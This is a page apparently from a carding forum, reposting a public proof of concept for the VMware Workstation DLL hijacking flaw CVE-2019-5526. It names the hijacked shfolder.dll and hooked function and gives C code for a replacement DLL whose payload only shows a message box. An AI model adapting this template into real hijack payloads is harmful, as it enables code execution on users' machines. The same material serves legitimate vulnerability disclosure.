You are using an out of date browser. It may not display this or other websites correctly.
You should upgrade or use an
alternative browser.
VMware Workstation DLL Hijacking by verified carding forum
TRUSTED VERIFIED SELLER
Staff member
VMware Workstation versions prior to 15.1.0 suffer from a dll hijacking vulnerability.
MD5 | e4ae43fff5271c25af6a88e2b9cdeb55
Download
Code:
#---------------------------------------------------------
# Title: VMware Workstation DLL hijacking < 15.1.0
# Date: 2019-05-14
# Author: Miguel Mendez Z. & Claudio Cortes C.
# Team: www.exploiting.cl
# Vendor: https://www.vmware.com
# Version: VMware Workstation Pro / Player (Workstation)
# Tested on: Windows Windows 7_x86/7_x64 [eng]
# Cve: CVE-2019-5526
#---------------------------------------------------------
Description:
VMware Workstation contains a DLL hijacking issue because some DLL.
DLL Hijacking: shfolder.dll
Hooking: SHGetFolderPathW()
------Code_Poc-------
#include "dll.h"
#include <windows.h>
DLLIMPORT void SHGetFolderPathW()
{
MessageBox(0, "s1kr10s", "VMWare-Poc", MB_ICONINFORMATION);
exit(0);
}
--------------------------
Click to expand...
https://www.vmware.com/security/advisories/VMSA-2019-0007.html